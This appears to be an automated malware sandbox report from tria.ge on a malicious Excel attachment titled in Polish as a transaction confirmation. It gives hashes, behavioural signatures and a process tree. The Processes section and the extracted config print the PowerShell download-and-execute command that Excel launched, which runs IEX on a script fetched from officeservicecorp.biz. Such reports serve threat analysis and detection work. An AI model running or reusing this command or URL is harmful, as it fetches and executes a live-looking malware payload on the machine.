Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
112s -
max time network
118s -
platform
windows7_x64 -
resource
win7 -
submitted
14/07/2020, 14:07
Static task
static1
Behavioral task
behavioral1
Sample
Potwierdzenie transakcji (5).xls
Resource
win7
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Potwierdzenie transakcji (5).xls
Resource
win10
0 signatures
0 seconds
General
-
Target
Potwierdzenie transakcji (5).xls
-
Size
856KB
-
MD5
92d6e6b45a4275700d0f6f57e1b41609
-
SHA1
2d9aa61c33bdcc875e610edac331901ed59a5b44
-
SHA256
2705cadf0dff4e6476415d0d51fafc2e121bdfde7e8649004bf1294a85f17a11
-
SHA512
2d25de03fa17fdbaf4ec0370fbc339a98aca9dd2f203f6ff243c7f61d82108fcea9f61f42b025cf76bcacef86c252d45561b7c8a42d2e00521ca352c88b43158
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://officeservicecorp.biz/Lab.jpg
Signatures
-
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 900 EXCEL.EXE 900 EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 900 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 900 EXCEL.EXE 900 EXCEL.EXE 900 EXCEL.EXE -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1488 900 powershell.exe 23 -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 900 wrote to memory of 1488 900 EXCEL.EXE 24 PID 900 wrote to memory of 1488 900 EXCEL.EXE 24 PID 900 wrote to memory of 1488 900 EXCEL.EXE 24 -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1488 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1488 powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji (5).xls"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1488
-